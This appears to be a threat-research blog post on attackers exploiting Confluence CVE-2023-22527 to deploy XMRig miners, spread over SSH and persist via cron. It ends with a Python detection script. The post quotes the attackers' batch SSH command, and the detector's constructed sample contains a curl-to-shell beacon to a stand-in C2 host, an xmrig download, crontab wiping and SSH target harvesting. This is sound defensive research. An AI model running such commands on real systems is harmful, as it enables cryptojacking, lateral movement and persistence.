- The critical vulnerability CVE-2023-22527 is currently being exploited for illicit cryptocurrency mining activities, transforming impacted environments into cryptocurrency mining networks.
- The intrusions involve malevolent actors who leverage techniques such as executing shell scripts and XMRig miners, aiming at SSH endpoints, terminating conflicting cryptocurrency mining operations, and ensuring continuity through cron jobs.
- Enterprises are encouraged to update their Confluence instances to the most recent versions and enforce security best practices and solutions to safeguard their systems.
On Jan 16, 2024, Atlassian issued a security announcement regarding CVE-2023-22527, a critical (score of 10) vulnerability that impacts Confluence Data Center and Confluence Server, which are corporate-grade deployments of Atlassian Confluence, a platform for collaboration and documentation intended for teams and organizations to generate, share, and cooperate on content.
In an earlier blog post, we offered a concise technical breakdown of CVE-2023-22527 and how a malicious entity could potentially exploit it for nefarious activities. In this article, we will explore how offenders have been abusing the vulnerability to launch illicit cryptocurrency mining campaigns.
By exploiting CVE-2023-22527, an unauthenticated attacker can abuse a template injection vulnerability present in outdated versions of Confluence Data Center and Server, ultimately achieving remote code execution (RCE) on the impacted instance.
| Product | Impacted versions |
|---|---|
| Confluence Data Center and Server | 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3 |
Table 1. Impacted Confluence Data Center and Confluence Server versions
This security flaw has been exploited for cryptomining purposes, and a significant number of exploitation attempts were detected between mid-June and late July 2024.

We have noted three primary malicious actors exploiting CVE-2023-22527 via harmful scripts. The initial actor deploys the XMRig miner to conduct mining operations using an ELF file payload (refer to figure 4).

The attack sequence carried out by the first malicious actor is as follows:
Meanwhile, the second malicious actor utilizes a shell script to execute mining operations through a shell file via Secure Shell (SSH) across all reachable endpoints in the client’s setup. As depicted in Figure 6, the intruder retrieves the shell file and executes it using bash from memory.

We have analyzed this script, unveiling the following actions:
Initially, it terminates recognized cryptomining processes and any processes executed from */tmp/* directories.

Subsequently, all cron jobs are erased, and a fresh job is inserted to verify C&C server connectivity every five minutes.

The der function removes security tools such as Alibaba Cloud Shield and blocks the Alibaba Cloud Shield IP address, while an elif branch uninstalls Tencent Cloud mirrors.

Through the localgo method, the intruder identifies the machine’s IP address and fetches all potential users, IP addresses, and keys sourced from the user’s bash history, SSH setups, and known hosts. This data is then utilized to target other remote systems via SSH for executing cryptomining operations.
Once the required information has been gathered, the intruder proceeds to automate cryptomining operations on other machines through SSH:
```
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "command"
```
- `-oStrictHostKeyChecking=no`: auto-accepts the host key without verification.
- `-oBatchMode=yes`: disables interactive password prompts.
- `-oConnectTimeout=3`: sets a 3-second timeout for the connection attempt.
In the script's next function, cron, the attacker inserts several cron tasks under different names (whoami, nginx, apache) in several locations (init.d, cron.hourly, cron.d) to maintain control over the server.
After ensuring the cessation or removal of all cloud monitoring and security services, the attacker ceases the initial attack vector exploiting CVE-2023-22527 and acquires the XMRig miner to commence the mining operations.
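The behaviours attributed to the second actor's script above (killing /tmp processes, wiping crontab and adding a five-minute beacon, harvesting SSH targets from bash history and known_hosts, batch SSH with host-key checking disabled, fetching XMRig, and dropping cron files named whoami, nginx or apache) lend themselves to a simple triage check. The following is an added example written for this article, not code from the original post or from the actors: it runs pattern rules over a constructed sample script and audits the cron and init drop locations the post names. The rule regexes, directory paths and the sample script are assumptions chosen for illustration.

```python
import re
from pathlib import Path

# Each rule is (label, regex); the patterns follow the script behaviours the post describes.
RULES = [
    ("kills-tmp-processes", re.compile(r"\b(pkill|kill)\b.*/tmp/")),
    ("wipes-crontab", re.compile(r"\bcrontab\s+-r\b")),
    ("5-min-beacon-cron", re.compile(r"\*/5\s+\*\s+\*\s+\*\s+\*\s+.*\b(curl|wget)\b")),
    ("ssh-unverified-batch", re.compile(r"\bssh\b.*-oStrictHostKeyChecking=no.*-oBatchMode=yes")),
    ("harvests-ssh-targets", re.compile(r"\.bash_history|\.ssh/(config|known_hosts)")),
    ("xmrig-download", re.compile(r"\b(curl|wget)\b.*xmrig", re.I)),
]
SUSPECT_CRON_NAMES = {"whoami", "nginx", "apache"}               # file names reported in the post
CRON_DIRS = ("/etc/cron.d", "/etc/cron.hourly", "/etc/init.d")  # assumed drop locations

def scan_script(text: str) -> list[str]:
    """Return the label of every rule that matches somewhere in the script body."""
    return [label for label, rx in RULES if rx.search(text)]

def suspect_cron_entries(paths) -> list[str]:
    """Keep only paths that sit directly in a watched directory and carry a suspect name."""
    hits = [p for p in paths
            if str(Path(p).parent) in CRON_DIRS and Path(p).name in SUSPECT_CRON_NAMES]
    return sorted(hits)

def audit_cron_dirs() -> list[str]:
    """Walk the watched directories on this host and return suspect entries."""
    present = [str(f) for d in CRON_DIRS if Path(d).is_dir() for f in Path(d).iterdir()]
    return suspect_cron_entries(present)

# Constructed sample that mimics the described behaviour; it is not the real script.
SAMPLE = """#!/bin/bash
pkill -f /tmp/
crontab -r
echo "*/5 * * * * curl -fsSL http://c2.invalid/check | sh" | crontab -
for h in $(grep -ohE '[0-9.]+' ~/.bash_history ~/.ssh/known_hosts); do
  ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 root@$h "uptime"
done
wget -q http://c2.invalid/xmrig -O /tmp/xmrig
"""
BENIGN = "#!/bin/bash\napt-get update && apt-get -y upgrade\n"

if __name__ == "__main__":
    print("sample script:", scan_script(SAMPLE))   # all six labels fire
    print("benign script:", scan_script(BENIGN))   # []
    print("cron/init drop locations:", audit_cron_dirs())
```

Point `scan_script` at scripts recovered from /tmp or from process command lines, and run `audit_cron_dirs` on hosts that exposed a vulnerable Confluence instance.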
